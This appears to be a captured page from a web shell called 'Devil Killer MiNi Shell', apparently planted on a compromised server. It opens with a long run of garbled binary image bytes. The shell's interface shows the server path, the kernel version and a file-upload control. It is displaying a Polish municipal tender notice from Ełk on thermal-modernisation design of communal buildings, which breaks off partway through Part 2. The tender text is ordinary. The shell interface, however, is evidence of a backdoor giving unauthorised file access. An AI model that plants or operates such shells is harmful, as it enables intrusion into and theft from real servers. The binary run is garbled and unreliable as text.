JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240806/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240806/0044631001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Poprawa efektywności energetycznej budynków komunalnych Gminy Miasta Ełk – wykonanie dokumentacji projektowej termomodernizacji budynków komunalnych z podziałem na pięć części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Ełk</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 790671076</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Marsz. Józefa Piłsudskiego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ełk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">087 732 62 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@um.elk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.elk.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa efektywności energetycznej budynków komunalnych Gminy Miasta Ełk – wykonanie dokumentacji projektowej termomodernizacji budynków komunalnych z podziałem na pięć części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4622e7a1-c9c4-440a-b0fd-37db13b86bff</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00446310</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00017045/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 Poprawa efektywności energetycznej budynków komunalnych Gminy Miasta Ełk – wykonanie dokumentacji projektowej termomodernizacji budynków komunalnych - z podziałem na 5 części</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4622e7a1-c9c4-440a-b0fd-37db13b86bff <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu E-Zamówień, który dostępny jest pod adresem: https://ezamowienia.gov.pl/, oraz poczty elektronicznej – um@um.elk.pl .<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>»Wykonawca« na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa »Regulamin Platformy e-Zamówienia«, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce »Centrum Pomocy«. (...)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>a) Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Miasta Ełku jest Prezydent Miasta Ełku, ul. Marsz. J. Piłsudskiego 4, 19-300 Ełk;<br/>b) jeśli ma Pani/Pan pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych osobowych w zakresie działania Urzędu Miasta Ełku, a także przysługujących Pani/Panu uprawnień, może się Pani/Pan skontaktować się z Inspektorem Ochrony Danych Osobowych w Urzędzie Miasta Ełku za pomocą adresu e-mail: dpo@um.elk.pl ;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego Poprawa efektywności energetycznej budynków komunalnych Gminy Miasta Ełk – wykonanie dokumentacji projektowej termomodernizacji budynków komunalnych, z podziałem na pięć części, nr sprawy: O-ZP.271.20.2024, prowadzonym w trybie podstawowym;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz. U. z 2021 r. poz. 1129 z późn. zm.), dalej „ustawa Pzp”; <br/>e) Pani/Pana dane osobowe będą przechowywane przez okres przechowywania dokumentacji z postępowania o udzielenie zamówienia publicznego;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h) posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>i) nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">* Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku po-stępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>** W postępowaniu zabezpieczenie o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">O-ZP.271.20.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 – Budynek mieszkalny ul. Kolonia 13, 19-300 Ełk <br/>Przedmiotem zamówienia jest opracowanie projektu budowlano – technicznego termomodernizacji budynku mieszkalnego przy ul. Kolonia 13 w Ełku.<br/>Kubatura budynku 501,6 m3, powierzchnia zabudowy 165,34 m2.<br/>Istniejący budynek mieszkalny, wielorodzinny, posiada dwie kondygnacje nadziemne i 1 kondygnację podziemną.<br/>Zbudowany na planie prostokąta, jest to obiekt wolnostojący o prostej formie architektonicznej. Ściany zewnętrzne i wewnętrzne murowane są z cegły na zaprawie wapiennej. Dach o konstrukcji drewnianej krokwiowo - płatwiowej.<br/>Podłoga w piwnicy warstwowa wykonana z: posadzka, wylewka z betonu, warstwa betonu chudego oraz podsypka z piasku grubego.<br/>Przegrody budowlane wykazują istotne niedomagania dotyczące technologii budowlanej prowadzące do zbyt niskiej izolacyjność przegród zewnętrznych (ściany zewnętrze, okna, drzwi, dach, ściany cokołowe oraz ściany przy gruncie).<br/>Przy opracowywaniu projektów termomodernizacji budynku należy wykorzystać załączony audyt energetyczny.<br/>W ramach opracowania projektu należy przewidzieć następujące elementy:<br/>1) inwentaryzacja obiektu wraz z instalacjami sanitarnymi (zw, c.w.u, c.o, wentylacja),<br/>2) docieplenie stropodachu z wymianą pokrycia dachowego wraz z obróbkami blacharskimi, przebudową kominów i rur wywiewnych,<br/>3) docieplenie ścian zewnętrznych,<br/>4) docieplenie fundamentów z wykonaniem izolacji przeciwwilgotnościowej,<br/>5) wymiana opaski budynku<br/>6) wymiana stolarki okiennej oraz drzwi zewnętrznych,<br/>7) wymiana instalacji centralnego ogrzewania i ciepłej wody użytkowej z uwzględnieniem nowego bilansu cieplnego,<br/>8) wymiana instalacji zimnej wody,<br/>9) wykonanie instalacji wentylacji pomieszczeń,<br/>10) wymiana instalacji odgromowej.<br/>Projektant zobowiązany będzie uzyskać wszelkie uzgodnienia i decyzje niezbędne do zrealizowania projektu, w tym decyzję pozwolenia na budowę / zgłoszenie zamiaru wykonania robót.<br/>Projektant przekaże Zamawiającemu:<br/>1)	Projekt budowlany – 4 egz.<br/>2)	Projekty techniczne i wykonawcze wszystkich branż – po 3 egz.<br/>3)	Specyfikacje Techniczne wszystkich branż – po 2 egz.<br/>4)	Przedmiary robót z podziałem na koszty kwalifikowane i niekwalifikowalne w ramach termomodernizacji – 2 egz.<br/>5)	Kosztorys inwestorski z ZZK z podziałem na koszty kwalifikowane i niekwalifikowalne w ramach termomodernizacji – 2 egz.<br/>oraz na informatycznym nośniku danych 1 egz. w formacie PDF i wersji edytowalnej.<br/>Zobowiązuje się projektanta do udzielania odpowiedzi na zadane pytania do SWZ na roboty budowlane.<br/>Projektant zobowiązany będzie do uzyskania pozytywnej opinii Zespołu Opiniującego Projekty Inwestycyjne działającego przy Urzędzie Miasta Ełku, jak również wszystkich uzgodnień, pozwoleń i decyzji administracyjnych niezbędnych do zrealizowania inwestycji.<br/>Projektant zobowiązany będzie określić powierzchnię netto budynku podlegającą termomodernizacji.<br/>W związku z tym, iż dokumentacja wykorzystana zostanie w postępowaniu o udzielenie zamówienia publicznego na wykonanie robót budowlanych, Wykonawca zobowiązany jest wykonać tę dokumentację zgodnie z wymogami, o których mowa w art. 99 - 103 ustawy z dnia 11września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z późn. zm.), pod rygorem poniesienia konsekwencji finansowych (w pełnych wysokościach) z tytułu ewentualnych korekt finansowych, nałożonych na zamawiającego przez instytucje współfinansujące.<br/><br/>Gwarancja (dotyczy każdej części przedmiotu zamówienia) – minimalny wymagany okres gwarancji to 24 pełnych miesięcy od daty odbioru końcowego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 20000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert<br/>Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów (nazwa kryterium, waga,<br/>sposób punktowania):<br/><br/>Nazwa kryterium Waga<br/>Cena 60<br/>Gwarancja 40<br/><br/>1.1. Kryterium Cena (Wc)<br/>Oferta z najniższą ceną otrzyma max. liczbę punktów – przy czym max liczba punktów w tym kryterium to 60 - pozostałym ofertom przyznana zostanie proporcjonalnie mniejsza liczba punktów.<br/>Sposób punktacji za cenę oferty jest następujący:<br/><br/>Wc = Cn/Cp x 60<br/><br/>Cn – najniższa oferowana cena<br/>Cp – cena oferty porównywanej<br/>Wc – wynik<br/><br/>1.2. Kryterium Gwarancja (Wg)<br/>Oferta zawierająca gwarancję na przedmiot zamówienia powyżej 24 miesięcy otrzyma proporcjonalnie więcej punktów, przy czym max. liczba punktów w tym kryterium to 40 - okres oferowanej gwarancji należy określić w pełnych miesiącach.<br/>Sposób punktacji za okres gwarancji:<br/><br/>Wg = Gp/Gn x 40<br/><br/>Gp– okres gwarancji oferty porównywanej po odliczeniu okresu wymaganego tj. 24 miesięcy<br/>Gn – najdłuższy oferowany okres gwarancji po odliczeniu okresu wymaganego tj. 24 miesięcy<br/>Wg – wynik<br/><br/>Uwaga: W przypadku zaoferowania przez Wykonawcę 24-miesięcznej gwarancji na przedmiot zamówienia, oferta otrzyma 0 pkt. w tym kryterium.<br/>Gwarancja udzielona na 48 miesięcy i więcej, będzie przyjęta do liczenia punktacji w tym kryterium jako 48 miesięcy.<br/>Uwaga: minimalny wymagany okres gwarancji to 24 pełnych miesięcy od daty odbioru końcowego, oferta z gwarancją poniżej 24 miesięcy będzie odrzucona jako niezgodna z treścią SWZ.<br/><br/>2. Wynik<br/>Oferta, która uzyska największą sumę punktów w oparciu o ustalone kryteria, zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.<br/>W= Wc + Wg<br/><br/>W – wynik punktowy oferty<br/>Wc – wynik punktowy w kryterium ceny<br/>Wg – wynik punktowy w kryterium gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 – Budynek mieszkalny ul. Szkolna 5, 19-325 Ełk <br/>Przedmiotem zamówienia jest opracowanie projektu budowlano – technicznego termomodernizacji budynku mieszkalnego przy ul. Szkolnej 5 w Stradunach.<br/>Kubatura budynku 928,00 m3, powierzchnia zabudowy 351,28 m2.<br/>Istniejący budynek mieszkalny, wielorodzinny, posiada jedną kondygnację nadziemną budynek nie jest podpiwniczony. Zbudowany na planie prostokąta, jest to obiekt wolnostojący o prostej formie architektonicznej. Ściany zewnętrzne i wewnętrzne murowane są z cegły na zaprawie wapiennej. Dach o konstrukcji drewnianej krokwiowo - płatwiowej.<br/>Podłoga na gruncie warstwowa wykonana z: posadzka, wylewka z betonu, warstwa betonu chudego oraz podsypka z piasku grubego.<br/>Przegrody budowlane wykazują istotne niedomagania dotyczące technologii budowlanej prowadzące do zbyt niskiej izolacyjność przegród zewnętrznych (ściany zewnętrze, okna, drzwi, dach).<br/>Przy opracowywaniu projektów termomodernizacji budynku należy wykorzystać załączony audyt energetyczny.<br/>W ramach opracowania projektu należy przewidzieć następujące elementy:<br/>1) inwentaryzacja obiektu,<br/>2) docieplenie stropodachu z wymianą pokrycia dachowego wraz z obróbkami blacharskimi, przebudową kominów i rur wywiewnych,<br/>3) docieplenie ścian zewnętrznych,<br/>4) docieplenie fundamentów z wykonaniem izolacji przeciwwilgotnościowej,<br/>5) wymiana opaski budynku,<br/>6) wymiana stolarki okiennej oraz drzwi zewnętrznych<br/>7) wymiana instalacji odgromowej.<br/>Projektant przekaże Zamawiającemu:<br/>1)	Projekt budowlany – 4 egz.<br/>2)	Projekty techniczne i wykonawcze wszystkich branż – po 3 egz.<br/>3)	Specyfikacje Techniczne wszystkich branż – po 2 egz.<br/>4)	Przedmiary robót z podziałem na koszty kwalifikowane i niekwalifikowalne w ramach termomodernizacji – 2 egz.<br/>5)	Kosztorys inwestorski z ZZK z podziałem na koszty kwalifikowane i niekwalifikowalne w ramach termomodernizacji – 2 egz.<br/>oraz na informatycznym nośniku danych 1 egz. w formacie PDF i wersji edytowalnej.<br/>Zobowiązuje się projektanta do udzielania odpowiedzi na zadane pytania do SWZ na roboty budowlane.<br/>Projektant zobowiązany będzie do uzyskania pozytywnej opinii Zespołu Opiniującego Projekty Inwestycyjne działającego przy Urzędzie Miasta Ełku, jak również wszystkich uzgodnień, pozwoleń i decyzji administracyjnych niezbędnych do zrealizowania inwestycji.<br/>Projektant zobowiązany będzie określić powierzchnię netto budynku podlegającą termomodernizacji.<br/>W związku z tym, iż dokumentacja wykorzystana zostanie w postępowaniu o udzielenie zamówienia publicznego na wykonanie robót budowlanych, Wykonawca zobowiązany jest wykonać tę dokumentację zgodnie z wymogami, o których mowa w art. 99 - 103 ustawy z dnia 11września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z późn. zm.), pod rygorem poniesienia konsekwencji finansowych (w pełnych wysokościach) z tytułu ewentualnych korekt finansowych, nałożonych na zamawiającego przez instytucje współfinansujące.<br/><br/>Gwarancja (dotyczy każdej części przedmiotu zamówienia) – minimalny wymagany okres gwarancji to 24 pełnych miesięcy od daty odbioru końcowego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 30807,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert<br/>Wybór oferty dokonany zostanie na podstawie niżej przedstawionych 